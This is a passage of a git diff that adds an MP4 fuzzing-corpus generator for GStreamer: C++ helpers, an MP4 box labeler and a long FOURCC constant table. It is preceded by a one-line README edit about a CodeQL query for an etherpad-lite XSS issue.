[07_ReflectedXssWithSanitizer.ql](07_ReflectedXssWithSanitizer.ql) shows that it is very easy to add, making the result go away. Later on, this sanitizer was [replaced](https://github.com/ether/etherpad-lite/commit/dd7894d) with a custom sanitizer, which is, -unfortunately, ineffective. ([This snapshot](https://downloads.lgtm.com/snapshots/javascript/ether/etherpad-lite/Etherpad_1.6.4.zip) +unfortunately, ineffective. ([This snapshot](https://github.com/github/securitylab/releases/download/etherpad-1.6.4-patched-codeql-database/Etherpad_1.6.4.zip) of etherpad-lite v1.6.4 contains the new sanitizer.) However, all browsers mitigate against reflected file download vulnerabilities these days, so while the vulnerability still exists, it is no longer exploitable. diff --git a/Fuzzing/GStreamer/README.md b/Fuzzing/GStreamer/README.md new file mode 100644 index 0000000..ee5b827 --- /dev/null +++ b/Fuzzing/GStreamer/README.md @@ -0,0 +1,2 @@ +# MP4 corpus generator +An MP4 corpus generator diff --git a/Fuzzing/GStreamer/aux.h b/Fuzzing/GStreamer/aux.h new file mode 100644 index 0000000..b39c117 --- /dev/null +++ b/Fuzzing/GStreamer/aux.h @@ -0,0 +1,61 @@ +#pragma once + +#include +#include +#include + +inline uint32_t rand_uint32(uint32_t min_value, uint32_t max_value) { + + static std::random_device rd; + static std::mt19937 gen(rd()); + + uint32_t rand_number; + + std::uniform_int_distribution<> dist(min_value, max_value); + + rand_number = dist(gen); + + return rand_number; +} + + +inline std::string uint32_to_string(uint32_t fourcc){ + + std::string output = ""; + + output += fourcc & 0xFF; + output += (fourcc >> 8) & 0xFF; + output += (fourcc >> 16) & 0xFF; + output += (fourcc >> 24) & 0xFF; + + return output; +} + + +inline std::string uint32_to_string_BE(uint32_t fourcc){ + + std::string output = ""; + + output += (fourcc >> 24) & 0xFF; + output += (fourcc >> 16) & 0xFF; + output += (fourcc >> 8) & 0xFF; + output += fourcc & 0xFF; + + return output; +} + + +inline bool write_to_file(const std::string &content, std::filesystem::path file){ + + std::ofstream ofs(file, std::ios::out | std::ios::binary); + + if (!ofs) { + return false; + } + + ofs << content; + + ofs.close(); + + return true; +} \ No newline at end of file diff --git a/Fuzzing/GStreamer/labeler/MP4.cc b/Fuzzing/GStreamer/labeler/MP4.cc new file mode 100644 index 0000000..071eb4e --- /dev/null +++ b/Fuzzing/GStreamer/labeler/MP4.cc @@ -0,0 +1,114 @@ +#include + +#include "MP4.h" + + +std::string MP4_labeler::traverse(Node &node){ + + std::string output; + + for(int i=0; i < node.children().size(); i++){ + + Node &child = tree->get_node(node.children()[i]); + + output += traverse(child); + } + + + uint32_t size; + + if(node.get_id() == 0){ + size = 20; + }else{ + size = node.get_label().size() + output.size() + 4; + } + + std::string label = node.get_label(); + uint32_t label_size = label.size(); + + output = uint32_to_string_BE(size) + label + output; + + return output; +} + + + +MP4_labeler::MP4_labeler(RandomTree *in_tree) { + + this->tree = in_tree; + + priv_name = "MP4"; + + Node &root = this->tree->get_node(0); + + std::string root_label = "ftyp"; + root_label += "dash"; + root_label += "AAAABBBB"; + + root.set_label(root_label); + + for(int i=1; i < this->tree->size(); i++){ + + Node &node = this->tree->get_node(i); + + + uint32_t fourcc; + + uint32_t padding; + + uint32_t random_data; + + + if(node.children().size() == 0){ + + //LEAF + + uint32_t random = rand_uint32(0, FOURCC_LIST_SIZE-1); + + fourcc = FOURCC_LIST[random].fourcc; + + padding = FOURCC_LIST[random].min_size; + + random_data = rand_uint32(4, 16); + + + }else{ + + //CONTAINER + + uint32_t random = rand_uint32(0, CONTAINER_LIST_SIZE-1); + + fourcc = CONTAINER_LIST[random].fourcc; + + padding = CONTAINER_LIST[random].min_size; + + random_data = 0; + + } + + std::string label = uint32_to_string(fourcc); + + label += std::string(padding, '\x00'); + + label += std::string(random_data, '\x41'); + + node.set_label(label); + + } +} + + + + +std::string MP4_labeler::serialize(){ + + std::string output; + + Node &root = tree->get_node(0); + + output = traverse(root); + + return output; + +} + diff --git a/Fuzzing/GStreamer/labeler/MP4.h b/Fuzzing/GStreamer/labeler/MP4.h new file mode 100644 index 0000000..972a114 --- /dev/null +++ b/Fuzzing/GStreamer/labeler/MP4.h @@ -0,0 +1,25 @@ +#pragma once + +#include +#include + +#include + +#include "fourcc.h" +#include "labeler.h" + + +class MP4_labeler : public Labeler{ + + private: + + RandomTree *tree; + + std::string traverse(Node &node); + + public: + + MP4_labeler(RandomTree *in_tree); + + std::string serialize(); +}; diff --git a/Fuzzing/GStreamer/labeler/fourcc.h b/Fuzzing/GStreamer/labeler/fourcc.h new file mode 100644 index 0000000..4bd83ad --- /dev/null +++ b/Fuzzing/GStreamer/labeler/fourcc.h @@ -0,0 +1,641 @@ +#pragma once + +#include + + +/* FOURCC data copied from GStreamer project (https://gstreamer.freedesktop.org/) */ + +#define guint32 uint32_t + +#define GST_MAKE_FOURCC(a,b,c,d) \ + ( (guint32)(a) | ((guint32) (b)) << 8 | ((guint32) (c)) << 16 | ((guint32) (d)) << 24 ) + +#define FOURCC_2vuy GST_MAKE_FOURCC('2','v','u','y') +#define FOURCC_FMP4 GST_MAKE_FOURCC('F','M','P','4') +#define FOURCC_H264 GST_MAKE_FOURCC('H','2','6','4') +#define FOURCC_H265 GST_MAKE_FOURCC('H','2','6','5') +#define FOURCC_MAC3 GST_MAKE_FOURCC('M','A','C','3') +#define FOURCC_MAC6 GST_MAKE_FOURCC('M','A','C','6') +#define FOURCC_MP4V GST_MAKE_FOURCC('M','P','4','V') +#define FOURCC_PICT GST_MAKE_FOURCC('P','I','C','T') +#define FOURCC_QDM2 GST_MAKE_FOURCC('Q','D','M','2') +#define FOURCC_SVQ3 GST_MAKE_FOURCC('S','V','Q','3') +#define FOURCC_VP31 GST_MAKE_FOURCC('V','P','3','1') +#define FOURCC_VP80 GST_MAKE_FOURCC('V','P','8','0') +#define FOURCC_WRLE GST_MAKE_FOURCC('W','R','L','E') +#define FOURCC_XMP_ GST_MAKE_FOURCC('X','M','P','_') +#define FOURCC_XVID GST_MAKE_FOURCC('X','V','I','D') +#define FOURCC__ART GST_MAKE_FOURCC(0xa9,'A','R','T') +#define FOURCC_____ GST_MAKE_FOURCC('-','-','-','-') +#define FOURCC___in GST_MAKE_FOURCC(' ',' ','i','n') +#define FOURCC___ty GST_MAKE_FOURCC(' ',' ','t','y') +#define FOURCC__alb GST_MAKE_FOURCC(0xa9,'a','l','b') +#define FOURCC__cpy GST_MAKE_FOURCC(0xa9,'c','p','y') +#define FOURCC__day GST_MAKE_FOURCC(0xa9,'d','a','y') +#define FOURCC__des GST_MAKE_FOURCC(0xa9,'d','e','s') +#define FOURCC__enc GST_MAKE_FOURCC(0xa9,'e','n','c') +#define FOURCC__gen GST_MAKE_FOURCC(0xa9, 'g', 'e', 'n') +#define FOURCC__grp GST_MAKE_FOURCC(0xa9,'g','r','p') +#define FOURCC__inf GST_MAKE_FOURCC(0xa9,'i','n','f') +#define FOURCC__lyr GST_MAKE_FOURCC(0xa9,'l','y','r') +#define FOURCC__mp3 GST_MAKE_FOURCC('.','m','p','3') +#define FOURCC__nam GST_MAKE_FOURCC(0xa9,'n','a','m') +#define FOURCC__req GST_MAKE_FOURCC(0xa9,'r','e','q') +#define FOURCC__too GST_MAKE_FOURCC(0xa9,'t','o','o') +#define FOURCC__wrt GST_MAKE_FOURCC(0xa9,'w','r','t') +#define FOURCC_aART GST_MAKE_FOURCC('a','A','R','T') +#define FOURCC_ac_3 GST_MAKE_FOURCC('a','c','-','3') +#define FOURCC_agsm GST_MAKE_FOURCC('a','g','s','m') +#define FOURCC_ai12 GST_MAKE_FOURCC('a','i','1','2') +#define FOURCC_ai13 GST_MAKE_FOURCC('a','i','1','3') +#define FOURCC_ai15 GST_MAKE_FOURCC('a','i','1','5') +#define FOURCC_ai16 GST_MAKE_FOURCC('a','i','1','6') +#define FOURCC_ai1p GST_MAKE_FOURCC('a','i','1','p') +#define FOURCC_ai1q GST_MAKE_FOURCC('a','i','1','q') +#define FOURCC_ai52 GST_MAKE_FOURCC('a','i','5','2') +#define FOURCC_ai53 GST_MAKE_FOURCC('a','i','5','3') +#define FOURCC_ai55 GST_MAKE_FOURCC('a','i','5','5') +#define FOURCC_ai56 GST_MAKE_FOURCC('a','i','5','6') +#define FOURCC_ai5p GST_MAKE_FOURCC('a','i','5','p') +#define FOURCC_ai5q GST_MAKE_FOURCC('a','i','5','q') +#define FOURCC_alac GST_MAKE_FOURCC('a','l','a','c') +#define FOURCC_fLaC GST_MAKE_FOURCC('f','L','a','C') +#define FOURCC_dfLa GST_MAKE_FOURCC('d','f','L','a') +#define FOURCC_alaw GST_MAKE_FOURCC('a','l','a','w') +#define FOURCC_alis GST_MAKE_FOURCC('a','l','i','s') +#define FOURCC_appl GST_MAKE_FOURCC('a','p','p','l') +#define FOURCC_avc1 GST_MAKE_FOURCC('a','v','c','1') +#define FOURCC_avc3 GST_MAKE_FOURCC('a','v','c','3') +#define FOURCC_avcC GST_MAKE_FOURCC('a','v','c','C') +#define FOURCC_c608 GST_MAKE_FOURCC('c','6','0','8') +#define FOURCC_c708 GST_MAKE_FOURCC('c','7','0','8') +#define FOURCC_ccdp GST_MAKE_FOURCC('c','c','d','p') +#define FOURCC_cdat GST_MAKE_FOURCC('c','d','a','t') +#define FOURCC_cdt2 GST_MAKE_FOURCC('c','d','t','2') +#define FOURCC_clcp GST_MAKE_FOURCC('c','l','c','p') +#define FOURCC_clip GST_MAKE_FOURCC('c','l','i','p') +#define FOURCC_cmov GST_MAKE_FOURCC('c','m','o','v') +#define FOURCC_cmvd GST_MAKE_FOURCC('c','m','v','d') +#define FOURCC_co64 GST_MAKE_FOURCC('c','o','6','4') +#define FOURCC_covr GST_MAKE_FOURCC('c','o','v','r') +#define FOURCC_cpil GST_MAKE_FOURCC('c','p','i','l') +#define FOURCC_cprt GST_MAKE_FOURCC('c','p','r','t') +#define FOURCC_crgn GST_MAKE_FOURCC('c','r','g','n') +#define FOURCC_ctab GST_MAKE_FOURCC('c','t','a','b') +#define FOURCC_ctts GST_MAKE_FOURCC('c','t','t','s') +#define FOURCC_cslg GST_MAKE_FOURCC('c','s','l','g') +#define FOURCC_d263 GST_MAKE_FOURCC('d','2','6','3') +#define FOURCC_dac3 GST_MAKE_FOURCC('d','a','c','3') +#define FOURCC_damr GST_MAKE_FOURCC('d','a','m','r') +#define FOURCC_data GST_MAKE_FOURCC('d','a','t','a') +#define FOURCC_dcom GST_MAKE_FOURCC('d','c','o','m') +#define FOURCC_desc GST_MAKE_FOURCC('d','e','s','c') +#define FOURCC_dhlr GST_MAKE_FOURCC('d','h','l','r') +#define FOURCC_dinf GST_MAKE_FOURCC('d','i','n','f') +#define FOURCC_disc GST_MAKE_FOURCC('d','i','s','c') +#define FOURCC_disk GST_MAKE_FOURCC('d','i','s','k') +#define FOURCC_drac GST_MAKE_FOURCC('d','r','a','c') +#define FOURCC_dref GST_MAKE_FOURCC('d','r','e','f') +#define FOURCC_drmi GST_MAKE_FOURCC('d','r','m','i') +#define FOURCC_drms GST_MAKE_FOURCC('d','r','m','s') +#define FOURCC_dvcp GST_MAKE_FOURCC('d','v','c','p') +#define FOURCC_dvc_ GST_MAKE_FOURCC('d','v','c',' ') +#define FOURCC_dv5p GST_MAKE_FOURCC('d','v','5','p') +#define FOURCC_dv5n GST_MAKE_FOURCC('d','v','5','n') +#define FOURCC_dva1 GST_MAKE_FOURCC('d','v','a','1') +#define FOURCC_dvav GST_MAKE_FOURCC('d','v','a','v') +#define FOURCC_dvh1 GST_MAKE_FOURCC('d','v','h','1') +#define FOURCC_dvhe GST_MAKE_FOURCC('d','v','h','e') +#define FOURCC_dvcC GST_MAKE_FOURCC('d','v','c','C') +#define FOURCC_edts GST_MAKE_FOURCC('e','d','t','s') +#define FOURCC_elst GST_MAKE_FOURCC('e','l','s','t') +#define FOURCC_enda GST_MAKE_FOURCC('e','n','d','a') +#define FOURCC_esds GST_MAKE_FOURCC('e','s','d','s') +#define FOURCC_fmp4 GST_MAKE_FOURCC('f','m','p','4') +#define FOURCC_free GST_MAKE_FOURCC('f','r','e','e') +#define FOURCC_frma GST_MAKE_FOURCC('f','r','m','a') +#define FOURCC_ftyp GST_MAKE_FOURCC('f','t','y','p') +#define FOURCC_ftab GST_MAKE_FOURCC('f','t','a','b') +#define FOURCC_gama GST_MAKE_FOURCC('g','a','m','a') +#define FOURCC_glbl GST_MAKE_FOURCC('g','l','b','l') +#define FOURCC_gmhd GST_MAKE_FOURCC('g','m','h','d') +#define FOURCC_gmin GST_MAKE_FOURCC('g','m','i','n') +#define FOURCC_gnre GST_MAKE_FOURCC('g','n','r','e') +#define FOURCC_h263 GST_MAKE_FOURCC('h','2','6','3') +#define FOURCC_hdlr GST_MAKE_FOURCC('h','d','l','r') +#define FOURCC_hev1 GST_MAKE_FOURCC('h','e','v','1') +#define FOURCC_hint GST_MAKE_FOURCC('h','i','n','t') +#define FOURCC_hmhd GST_MAKE_FOURCC('h','m','h','d') +#define FOURCC_hndl GST_MAKE_FOURCC('h','n','d','l') +#define FOURCC_hnti GST_MAKE_FOURCC('h','n','t','i') +#define FOURCC_hvc1 GST_MAKE_FOURCC('h','v','c','1') +#define FOURCC_hvcC GST_MAKE_FOURCC('h','v','c','C') +#define FOURCC_ilst GST_MAKE_FOURCC('i','l','s','t') +#define FOURCC_ima4 GST_MAKE_FOURCC('i','m','a','4') +#define FOURCC_imap GST_MAKE_FOURCC('i','m','a','p') +#define FOURCC_s16l GST_MAKE_FOURCC('s','1','6','l') +#define FOURCC_in24 GST_MAKE_FOURCC('i','n','2','4') +#define FOURCC_in32 GST_MAKE_FOURCC('i','n','3','2') +#define FOURCC_fl64 GST_MAKE_FOURCC('f','l','6','4') +#define FOURCC_fl32 GST_MAKE_FOURCC('f','l','3','2') +#define FOURCC_jp2c GST_MAKE_FOURCC('j','p','2','c') +#define FOURCC_jpeg GST_MAKE_FOURCC('j','p','e','g') +#define FOURCC_keyw GST_MAKE_FOURCC('k','e','y','w') +#define FOURCC_kmat GST_MAKE_FOURCC('k','m','a','t') +#define FOURCC_kywd GST_MAKE_FOURCC('k','y','w','d') +#define FOURCC_load GST_MAKE_FOURCC('l','o','a','d') +#define FOURCC_matt GST_MAKE_FOURCC('m','a','t','t') +#define FOURCC_mdat GST_MAKE_FOURCC('m','d','a','t') +#define FOURCC_mdhd GST_MAKE_FOURCC('m','d','h','d') +#define FOURCC_mdia GST_MAKE_FOURCC('m','d','i','a') +#define FOURCC_mdir GST_MAKE_FOURCC('m','d','i','r') +#define FOURCC_mean GST_MAKE_FOURCC('m','e','a','n') +#define FOURCC_meta GST_MAKE_FOURCC('m','e','t','a') +#define FOURCC_mhlr GST_MAKE_FOURCC('m','h','l','r') +#define FOURCC_minf GST_MAKE_FOURCC('m','i','n','f') +#define FOURCC_moov GST_MAKE_FOURCC('m','o','o','v') +#define FOURCC_mp3_ GST_MAKE_FOURCC('m','p','3',' ') +#define FOURCC_mp4a GST_MAKE_FOURCC('m','p','4','a') +#define FOURCC_mp4s GST_MAKE_FOURCC('m','p','4','s') +#define FOURCC_mp4s GST_MAKE_FOURCC('m','p','4','s') +#define FOURCC_mp4v GST_MAKE_FOURCC('m','p','4','v') +#define FOURCC_name GST_MAKE_FOURCC('n','a','m','e') +#define FOURCC_nclc GST_MAKE_FOURCC('n','c','l','c') +#define FOURCC_nclx GST_MAKE_FOURCC('n','c','l','x') +#define FOURCC_nmhd GST_MAKE_FOURCC('n','m','h','d') +#define FOURCC_opus GST_MAKE_FOURCC('O','p','u','s') +#define FOURCC_dops GST_MAKE_FOURCC('d','O','p','s') +#define FOURCC_pasp GST_MAKE_FOURCC('p','a','s','p') +#define FOURCC_colr GST_MAKE_FOURCC('c','o','l','r') +#define FOURCC_clap GST_MAKE_FOURCC('c','l','a','p') +#define FOURCC_tapt GST_MAKE_FOURCC('t','a','p','t') +#define FOURCC_clef GST_MAKE_FOURCC('c','l','e','f') +#define FOURCC_prof GST_MAKE_FOURCC('p','r','o','f') +#define FOURCC_enof GST_MAKE_FOURCC('e','n','o','f') +#define FOURCC_fiel GST_MAKE_FOURCC('f','i','e','l') +#define FOURCC_pcst GST_MAKE_FOURCC('p','c','s','t') +#define FOURCC_pgap GST_MAKE_FOURCC('p','g','a','p') +#define FOURCC_png GST_MAKE_FOURCC('p','n','g',' ') +#define FOURCC_pnot GST_MAKE_FOURCC('p','n','o','t') +#define FOURCC_qt__ GST_MAKE_FOURCC('q','t',' ',' ') +#define FOURCC_qtim GST_MAKE_FOURCC('q','t','i','m') +#define FOURCC_raw_ GST_MAKE_FOURCC('r','a','w',' ') +#define FOURCC_rdrf GST_MAKE_FOURCC('r','d','r','f') +#define FOURCC_rle_ GST_MAKE_FOURCC('r','l','e',' ') +#define FOURCC_rmda GST_MAKE_FOURCC('r','m','d','a') +#define FOURCC_rmdr GST_MAKE_FOURCC('r','m','d','r') +#define FOURCC_rmra GST_MAKE_FOURCC('r','m','r','a') +#define FOURCC_rmvc GST_MAKE_FOURCC('r','m','v','c') +#define FOURCC_rtp_ GST_MAKE_FOURCC('r','t','p',' ') +#define FOURCC_rtsp GST_MAKE_FOURCC('r','t','s','p') +#define FOURCC_s263 GST_MAKE_FOURCC('s','2','6','3') +#define FOURCC_samr GST_MAKE_FOURCC('s','a','m','r') +#define FOURCC_sawb GST_MAKE_FOURCC('s','a','w','b') +#define FOURCC_sbtl GST_MAKE_FOURCC('s','b','t','l') +#define FOURCC_sdp_ GST_MAKE_FOURCC('s','d','p',' ') +#define FOURCC_sidx GST_MAKE_FOURCC('s','i','d','x') +#define FOURCC_skip GST_MAKE_FOURCC('s','k','i','p') +#define FOURCC_smhd GST_MAKE_FOURCC('s','m','h','d') +#define FOURCC_soaa GST_MAKE_FOURCC('s','o','a','a') +#define FOURCC_soal GST_MAKE_FOURCC('s','o','a','l') +#define FOURCC_soar GST_MAKE_FOURCC('s','o','a','r') +#define FOURCC_soco GST_MAKE_FOURCC('s','o','c','o') +#define FOURCC_sonm GST_MAKE_FOURCC('s','o','n','m') +#define FOURCC_sosn GST_MAKE_FOURCC('s','o','s','n') +#define FOURCC_soun GST_MAKE_FOURCC('s','o','u','n') +#define FOURCC_sowt GST_MAKE_FOURCC('s','o','w','t') +#define FOURCC_stbl GST_MAKE_FOURCC('s','t','b','l') +#define FOURCC_stco GST_MAKE_FOURCC('s','t','c','o') +#define FOURCC_stpp GST_MAKE_FOURCC('s','t','p','p') +#define FOURCC_stps GST_MAKE_FOURCC('s','t','p','s') +#define FOURCC_strf GST_MAKE_FOURCC('s','t','r','f') +#define FOURCC_strm GST_MAKE_FOURCC('s','t','r','m') +#define FOURCC_stsc GST_MAKE_FOURCC('s','t','s','c') +#define FOURCC_stsd GST_MAKE_FOURCC('s','t','s','d') +#define FOURCC_stss GST_MAKE_FOURCC('s','t','s','s') +#define FOURCC_stsz GST_MAKE_FOURCC('s','t','s','z') +#define FOURCC_stts GST_MAKE_FOURCC('s','t','t','s') +#define FOURCC_styp GST_MAKE_FOURCC('s','t','y','p') +#define FOURCC_subp GST_MAKE_FOURCC('s','u','b','p') +#define FOURCC_subt GST_MAKE_FOURCC('s','u','b','t') +#define FOURCC_text GST_MAKE_FOURCC('t','e','x','t') +#define FOURCC_tcmi GST_MAKE_FOURCC('t','c','m','i') +#define FOURCC_tkhd GST_MAKE_FOURCC('t','k','h','d') +#define FOURCC_tmcd GST_MAKE_FOURCC('t','m','c','d') +#define FOURCC_tmpo GST_MAKE_FOURCC('t','m','p','o') +#define FOURCC_trak GST_MAKE_FOURCC('t','r','a','k') +#define FOURCC_tref GST_MAKE_FOURCC('t','r','e','f') +#define FOURCC_trkn GST_MAKE_FOURCC('t','r','k','n') +#define FOURCC_tven GST_MAKE_FOURCC('t','v','e','n') +#define FOURCC_tves GST_MAKE_FOURCC('t','v','e','s') +#define FOURCC_tvsh GST_MAKE_FOURCC('t','v','s','h') +#define FOURCC_tvsn GST_MAKE_FOURCC('t','v','s','n') +#define FOURCC_twos GST_MAKE_FOURCC('t','w','o','s') +#define FOURCC_tx3g GST_MAKE_FOURCC('t','x','3','g') +#define FOURCC_udta GST_MAKE_FOURCC('u','d','t','a') +#define FOURCC_ulaw GST_MAKE_FOURCC('u','l','a','w') +#define FOURCC_url_ GST_MAKE_FOURCC('u','r','l',' ') +#define FOURCC_uuid GST_MAKE_FOURCC('u','u','i','d') +#define FOURCC_v210 GST_MAKE_FOURCC('v','2','1','0') +#define FOURCC_vc_1 GST_MAKE_FOURCC('v','c','-','1') +#define FOURCC_vide GST_MAKE_FOURCC('v','i','d','e') +#define FOURCC_vmhd GST_MAKE_FOURCC('v','m','h','d') +#define FOURCC_vp08 GST_MAKE_FOURCC('v','p','0','8') +#define FOURCC_vp09 GST_MAKE_FOURCC('v','p','0','9') +#define FOURCC_vpcC GST_MAKE_FOURCC('v','p','c','C') +#define FOURCC_xvid GST_MAKE_FOURCC('x','v','i','d') +#define FOURCC_wave GST_MAKE_FOURCC('w','a','v','e') +#define FOURCC_wide GST_MAKE_FOURCC('w','i','d','e') +#define FOURCC_zlib GST_MAKE_FOURCC('z','l','i','b') +#define FOURCC_lpcm GST_MAKE_FOURCC('l','p','c','m') +#define FOURCC_av01 GST_MAKE_FOURCC('a','v','0','1') +#define FOURCC_av1C GST_MAKE_FOURCC('a','v','1','C') +#define FOURCC_av1f GST_MAKE_FOURCC('a','v','1','f') +#define FOURCC_av1m GST_MAKE_FOURCC('a','v','1','m') +#define FOURCC_av1s GST_MAKE_FOURCC('a','v','1','s') +#define FOURCC_av1M GST_MAKE_FOURCC('a','v','1','M') + +#define FOURCC_cfhd GST_MAKE_FOURCC('C','F','H','D') +#define FOURCC_ap4x GST_MAKE_FOURCC('a','p','4','x') +#define FOURCC_ap4h GST_MAKE_FOURCC('a','p','4','h') +#define FOURCC_apch GST_MAKE_FOURCC('a','p','c','h') +#define FOURCC_apcn GST_MAKE_FOURCC('a','p','c','n') +#define FOURCC_apco GST_MAKE_FOURCC('a','p','c','o') +#define FOURCC_apcs GST_MAKE_FOURCC('a','p','c','s') +#define FOURCC_m1v GST_MAKE_FOURCC('m','1','v',' ') +#define FOURCC_vivo GST_MAKE_FOURCC('v','i','v','o') +#define FOURCC_saiz GST_MAKE_FOURCC('s','a','i','z') +#define FOURCC_saio GST_MAKE_FOURCC('s','a','i','o') + +#define FOURCC_3gg6 GST_MAKE_FOURCC('3','g','g','6') +#define FOURCC_3gg7 GST_MAKE_FOURCC('3','g','g','7') +#define FOURCC_3gp4 GST_MAKE_FOURCC('3','g','p','4') +#define FOURCC_3gp6 GST_MAKE_FOURCC('3','g','p','6') +#define FOURCC_3gr6 GST_MAKE_FOURCC('3','g','r','6') +#define FOURCC_3g__ GST_MAKE_FOURCC('3','g',0,0) +#define FOURCC_isml GST_MAKE_FOURCC('i','s','m','l') +#define FOURCC_iso2 GST_MAKE_FOURCC('i','s','o','2') +#define FOURCC_isom GST_MAKE_FOURCC('i','s','o','m') +#define FOURCC_mp41 GST_MAKE_FOURCC('m','p','4','1') +#define FOURCC_mp42 GST_MAKE_FOURCC('m','p','4','2') +#define FOURCC_piff GST_MAKE_FOURCC('p','i','f','f') +#define FOURCC_titl GST_MAKE_FOURCC('t','i','t','l') + +/* SVQ3 fourcc */ +#define FOURCC_SEQH GST_MAKE_FOURCC('S','E','Q','H') +#define FOURCC_SMI_ GST_MAKE_FOURCC('S','M','I',' ') + +/* 3gpp asset meta data fourcc */ +#define FOURCC_albm GST_MAKE_FOURCC('a','l','b','m') +#define FOURCC_auth GST_MAKE_FOURCC('a','u','t','h') +#define FOURCC_clsf GST_MAKE_FOURCC('c','l','s','f') +#define FOURCC_dscp GST_MAKE_FOURCC('d','s','c','p') +#define FOURCC_loci GST_MAKE_FOURCC('l','o','c','i') +#define FOURCC_perf GST_MAKE_FOURCC('p','e','r','f') +#define FOURCC_rtng GST_MAKE_FOURCC('r','t','n','g') +#define FOURCC_yrrc GST_MAKE_FOURCC('y','r','r','c') + +/* misc tag stuff */ +#define FOURCC_ID32 GST_MAKE_FOURCC('I', 'D','3','2') + +/* ISO Motion JPEG 2000 fourcc */ +#define FOURCC_cdef GST_MAKE_FOURCC('c','d','e','f') +#define FOURCC_cmap GST_MAKE_FOURCC('c','m','a','p') +#define FOURCC_ihdr GST_MAKE_FOURCC('i','h','d','r') +#define FOURCC_jp2h GST_MAKE_FOURCC('j','p','2','h') +#define FOURCC_jp2x GST_MAKE_FOURCC('j','p','2','x') +#define FOURCC_mjp2 GST_MAKE_FOURCC('m','j','p','2') + +/* some buggy hardware's notion of mdhd */ +#define FOURCC_mhdr GST_MAKE_FOURCC('m','h','d','r') + +/* Fragmented MP4 */ +#define FOURCC_btrt GST_MAKE_FOURCC('b','t','r','t') +#define FOURCC_mehd GST_MAKE_FOURCC('m','e','h','d') +#define FOURCC_mfhd GST_MAKE_FOURCC('m','f','h','d') +#define FOURCC_mfra GST_MAKE_FOURCC('m','f','r','a') +#define FOURCC_mfro GST_MAKE_FOURCC('m','f','r','o') +#define FOURCC_moof GST_MAKE_FOURCC('m','o','o','f') +#define FOURCC_mvex GST_MAKE_FOURCC('m','v','e','x') +#define FOURCC_mvhd GST_MAKE_FOURCC('m','v','h','d') +#define FOURCC_ovc1 GST_MAKE_FOURCC('o','v','c','1') +#define FOURCC_owma GST_MAKE_FOURCC('o','w','m','a') +#define FOURCC_sdtp GST_MAKE_FOURCC('s','d','t','p') +#define FOURCC_tfhd GST_MAKE_FOURCC('t','f','h','d') +#define FOURCC_tfra GST_MAKE_FOURCC('t','f','r','a') +#define FOURCC_traf GST_MAKE_FOURCC('t','r','a','f') +#define FOURCC_trex GST_MAKE_FOURCC('t','r','e','x') +#define FOURCC_trun GST_MAKE_FOURCC('t','r','u','n') +#define FOURCC_wma_ GST_MAKE_FOURCC('w','m','a',' ') + +/* MPEG DASH */ +#define FOURCC_tfdt GST_MAKE_FOURCC('t','f','d','t') + +/* Xiph fourcc */ +#define FOURCC_XdxT GST_MAKE_FOURCC('X','d','x','T') +#define FOURCC_XiTh GST_MAKE_FOURCC('X','i','T','h') +#define FOURCC_tCtC GST_MAKE_FOURCC('t','C','t','C') +#define FOURCC_tCtH GST_MAKE_FOURCC('t','C','t','H') +#define FOURCC_tCt_ GST_MAKE_FOURCC('t','C','t','#') + +/* ilst metatags */ +#define FOURCC__cmt GST_MAKE_FOURCC(0xa9, 'c','m','t') + +/* apple tags */ +#define FOURCC__mak GST_MAKE_FOURCC(0xa9, 'm','a','k') +#define FOURCC__mod GST_MAKE_FOURCC(0xa9, 'm','o','d') +#define FOURCC__swr GST_MAKE_FOURCC(0xa9, 's','w','r') + +/* Chapters reference */ +#define FOURCC_chap GST_MAKE_FOURCC('c','h','a','p') + +/* For Microsoft Wave formats embedded in quicktime, the FOURCC is + 'm', 's', then the 16 bit wave codec id */ +#define MS_WAVE_FOURCC(codecid) GST_MAKE_FOURCC( \ + 'm', 's', ((codecid)>>8)&0xff, ((codecid)&0xff)) + +/* MPEG Application Format , Stereo Video */ +#define FOURCC_ss01 GST_MAKE_FOURCC('s','s','0','1') +#define FOURCC_ss02 GST_MAKE_FOURCC('s','s','0','2') +#define FOURCC_svmi GST_MAKE_FOURCC('s','v','m','i') +#define FOURCC_scdi GST_MAKE_FOURCC('s','c','d','i') + +/* Protected streams */ +#define FOURCC_encv GST_MAKE_FOURCC('e','n','c','v') +#define FOURCC_enca GST_MAKE_FOURCC('e','n','c','a') +#define FOURCC_enct GST_MAKE_FOURCC('e','n','c','t') +#define FOURCC_encs GST_MAKE_FOURCC('e','n','c','s') +#define FOURCC_sinf GST_MAKE_FOURCC('s','i','n','f') +#define FOURCC_frma GST_MAKE_FOURCC('f','r','m','a') +#define FOURCC_schm GST_MAKE_FOURCC('s','c','h','m') +#define FOURCC_schi GST_MAKE_FOURCC('s','c','h','i') + +/* Common Encryption */ +#define FOURCC_pssh GST_MAKE_FOURCC('p','s','s','h') +#define FOURCC_tenc GST_MAKE_FOURCC('t','e','n','c') +#define FOURCC_cenc GST_MAKE_FOURCC('c','e','n','c') +#define FOURCC_cbcs GST_MAKE_FOURCC('c','b','c','s') + +/* Audible AAX encrypted audio */ +#define FOURCC_aavd GST_MAKE_FOURCC('a','a','v','d') +#define FOURCC_adrm GST_MAKE_FOURCC('a','d','r','m') + +#define FOURCC_vttc GST_MAKE_FOURCC('v','t','t','c') + +#define FOURCC_sbgp GST_MAKE_FOURCC('s','b','g','p') +#define FOURCC_sgpd GST_MAKE_FOURCC('s','g','p','d') +#define FOURCC_wvtt GST_MAKE_FOURCC('w','v','t','t') + +#define FOURCC_metx GST_MAKE_FOURCC('m','e','t','x') +#define FOURCC_cstb GST_MAKE_FOURCC('c','s','t','b') + + +#define QT_FLAG_CONTAINER true + +#include + +struct fourcc_info { + uint32_t fourcc; + std::string name; + size_t min_size; +}; + +const fourcc_info CONTAINER_LIST[] = { + + {FOURCC_moov, "movie", 0,}, + {FOURCC_vttc, "VTTCueBox 14496-30", 0}, + {FOURCC_clip, "clipping", 0,}, + {FOURCC_trak, "track", 0,}, + {FOURCC_udta, "user data", 0,}, + {FOURCC_matt, "track matte", 0,}, + {FOURCC_edts, "edit", 0,}, + {FOURCC_tref, "track reference", 0,}, + {FOURCC_imap, "track input map", 0,}, + {FOURCC_mdia, "media", 0}, + {FOURCC_minf, "media information", 0}, + {FOURCC_gmhd, "base media information header", 0}, + {FOURCC_dinf, "data information", 0}, + {FOURCC_stbl, "sample table", 0}, + {FOURCC_cmov, "compressed movie", 0}, + {FOURCC_mhdr, "mhdr", 0,}, + {FOURCC_jp2h, "jp2h", 0,}, + {FOURCC_wave, "wave", 0}, + {FOURCC_appl, "appl", 0}, + {FOURCC_cfhd, "cfhd", 0}, + {FOURCC_hnti, 